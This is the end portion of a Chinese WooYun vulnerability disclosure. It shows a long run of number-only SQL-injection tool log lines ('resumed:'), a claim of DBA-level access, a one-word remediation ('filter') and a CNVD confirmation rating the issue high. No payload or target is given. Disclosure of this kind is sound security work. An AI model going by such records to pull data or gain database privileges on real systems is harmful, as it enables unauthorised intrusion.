[18:32:28] [INFO] resumed: 46355
[18:32:28] [INFO] resumed: 92710
[18:32:28] [INFO] resumed: 9
[18:32:28] [INFO] resumed: 15
[18:32:28] [INFO] resumed: 397201
[18:32:28] [INFO] resumed: 515586
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 565
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 67
[18:32:28] [INFO] resumed: 7
[18:32:28] [INFO] resumed: 113
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 4746
[18:32:28] [INFO] resumed: 173525
[18:32:28] [INFO] resumed: 175014
[18:32:28] [INFO] resumed: 100808
[18:32:28] [INFO] resumed: 1599446
[18:32:28] [INFO] resumed: 125323
[18:32:28] [INFO] resumed: 6022140
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 6451
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 22965328
[18:32:28] [INFO] resumed: 23376349
[18:32:28] [INFO] resumed: 23382699
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 3033
[18:32:28] [INFO] resumed: 7
[18:32:28] [INFO] resumed: 249
[18:32:28] [INFO] resumed: 249
[18:32:28] [INFO] resumed: 1764
[18:32:28] [INFO] resumed: 878
[18:32:28] [INFO] resumed: 1901
[18:32:28] [INFO] resumed: 1495
[18:32:28] [INFO] resumed: 115
[18:32:28] [INFO] resumed: 945
[18:32:28] [INFO] resumed: 7041
[18:32:28] [INFO] resumed: 1013
[18:32:28] [INFO] resumed: 3047
[18:32:28] [INFO] resumed: 141308385
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 0
[18:32:28] [INFO] resumed: 2881745
[18:32:28] [INFO] resumed: 893
[18:32:28] [INFO] resumed: 70660
[18:32:28] [INFO] resumed: 35248
[18:32:28] [INFO] resumed: 178789
[18:32:28] [INFO] resumed: 3158
[18:32:28] [INFO] resumed: 11
[18:32:28] [INFO] resumed: 19516
[18:32:28] [INFO] resumed: 19595
[18:32:28] [INFO] resumed: 19595
[18:32:28] [INFO] resumed: 19806
[18:32:28] [INFO] resumed: 19632
[18:32:28] [INFO] resumed: 19595
[18:32:28] [INFO] resumed: 19553
[18:32:28] [INFO] resumed: 8
[18:32:28] [INFO] resumed: 1348
[18:32:28] [INFO] resumed: 28364
[18:32:28] [INFO] resumed: 71
[18:32:28] [INFO] resumed: 786
[18:32:28] [INFO] resumed: 140158
[18:32:28] [INFO] resumed: 358735
[18:32:28] [INFO] resumed: 346773
[18:32:28] [INFO] resumed: 170082
[18:32:28] [INFO] resumed: 1112999
[18:32:28] [INFO] resumed: 291305
[18:32:28] [INFO] resumed: 2412720
[18:32:28] [INFO] resumed: 4900735
[18:32:28] [INFO] resumed: 46354
[18:32:28] [INFO] resumed: 46400
[18:32:28] [INFO] resumed: 315318
[18:32:28] [INFO] resumed: 969665
[18:32:28] [INFO] resumed: 76028
[18:32:28] [INFO] resumed: 4061832
[18:32:29] [INFO] resumed: 64284916
[18:32:29] [INFO] resumed: 32935
[18:32:29] [INFO] resumed: 8286389
[18:32:29] [INFO] resumed: 3646812
[18:32:29] [INFO] resumed: 1654
[18:32:29] [INFO] resumed: 284
[18:32:29] [INFO] resumed: 57565
[18:32:29] [INFO] resumed: 12
[18:32:29] [INFO] resumed: 48070
[18:32:29] [INFO] resumed: 14938
[18:32:29] [INFO] resumed: 19601
[18:32:29] [INFO] resumed: 33456
[18:32:29] [INFO] resumed: 13804
[18:32:29] [INFO] resumed: 26814
[18:32:29] [INFO] resumed: 17332
[18:32:29] [INFO] resumed: 19892
[18:32:29] [INFO] resumed: 99118
[18:32:29] [INFO] resumed: 17106
[18:32:29] [INFO] resumed: 13306
[18:32:29] [INFO] resumed: 12998
[18:32:29] [INFO] resumed: 9593640
[18:32:29] [INFO] resumed: 6497974
[18:32:29] [INFO] resumed: 848
[18:32:29] [INFO] resumed: 1177
[18:32:29] [INFO] resumed: 1949
[18:32:29] [INFO] resumed: 1800
[18:32:29] [INFO] resumed: 64
[18:32:29] [INFO] resumed: 0
[18:32:29] [INFO] resumed: 121
[18:32:29] [INFO] resumed: 55
[18:32:29] [INFO] resumed: 96
[18:32:29] [INFO] resumed: 4
[18:32:29] [INFO] resumed: 1131
[18:32:29] [INFO] resumed: 53
[18:32:29] [INFO] resumed: 90
[18:32:29] [INFO] resumed: 90
[18:32:29] [INFO] resumed: 2013
[18:32:29] [INFO] resumed: 165
[18:32:29] [INFO] resumed: 293285
[18:32:29] [INFO] resumed: 425
[18:32:29] [INFO] resumed: 15
[18:32:29] [INFO] resumed: 26943
[18:32:29] [INFO] resumed: 271
[18:32:29] [INFO] resumed: 36
[18:32:29] [INFO] resumed: 826
[18:32:29] [INFO] resumed: 147838
[18:32:29] [INFO] resumed: 61
[18:32:29] [INFO] resumed: 225
[18:32:29] [INFO] resumed: 223
[18:32:29] [INFO] resumed: 59
[18:32:29] [INFO] resumed: 75
[18:32:29] [INFO] resumed: 7
[18:32:29] [INFO] resumed: 188441
[18:32:29] [INFO] resumed: 8
[18:32:29] [INFO] resumed: 203
[18:32:29] [INFO] resumed: 5037
[18:32:29] [INFO] resumed: 162
[18:32:29] [INFO] resumed: 749
[18:32:29] [INFO] resumed: 4712
[18:32:29] [INFO] resumed: 11
[18:32:29] [INFO] resumed: 15
[18:32:29] [INFO] resumed: 216
[18:32:29] [INFO] resumed: 25
[18:32:29] [INFO] resumed: 192
[18:32:29] [INFO] resumed: 4
[18:32:29] [INFO] resumed: 357
[18:32:29] [INFO] resumed: 93
[18:32:29] [INFO] resumed: 93
[18:32:29] [INFO] resumed: 1659471
[18:32:29] [INFO] resumed: 35
[18:32:29] [INFO] resumed: 19449
[18:32:29] [INFO] resumed: 275
[18:32:29] [INFO] resumed: 143
[18:32:29] [INFO] resumed: 240
[18:32:29] [INFO] resumed: 11433
[18:32:29] [INFO] resumed: 94
[18:32:29] [INFO] resumed: 759
[18:32:30] [INFO] resumed: 595
[18:32:30] [INFO] resumed: 7
[18:32:30] [INFO] resumed: 10
[18:32:30] [INFO] resumed: 21
[18:32:30] [INFO] resumed: 633
[18:32:30] [INFO] resumed: 671
[18:32:30] [INFO] resumed: 4856
[18:32:30] [INFO] resumed: 291305
[18:32:30] [INFO] resumed: 3477
[18:32:30] [INFO] resumed: 19607
[18:32:30] [INFO] resumed: 0
[18:32:30] [INFO] resumed: 2335502
[18:32:30] [INFO] resumed: 3641727
[18:32:30] [INFO] resumed: 18391894
[18:32:30] [INFO] resumed: 1
[18:32:30] [INFO] resumed: 5531584
[18:32:30] [INFO] resumed: 9429568
[18:32:30] [INFO] resumed: 9510998
[18:32:30] [INFO] resumed: 9101037
[18:32:30] [INFO] resumed: 22979
[18:32:30] [INFO] resumed: 3325793
[18:32:30] [INFO] resumed: 1931028
[18:32:30] [INFO] resumed: 6451
[18:32:30] [INFO] resumed: 1785
[18:32:30] [INFO] resumed: 500051
[18:32:30] [INFO] resumed: 601324
[18:32:30] [INFO] resumed: 6771
[18:32:30] [INFO] resumed: 676
[18:32:30] [INFO] resumed: 140158
[18:32:30] [INFO] resumed: 1033
[18:32:30] [INFO] resumed: 101750
[18:32:30] [INFO] resumed: 290813
[18:32:30] [INFO] resumed: 665
[18:32:30] [INFO] resumed: 13612
[18:32:30] [INFO] resumed: 4227485


DBA权限

1.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-02 09:56

厂商回复:

CNVD确认现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无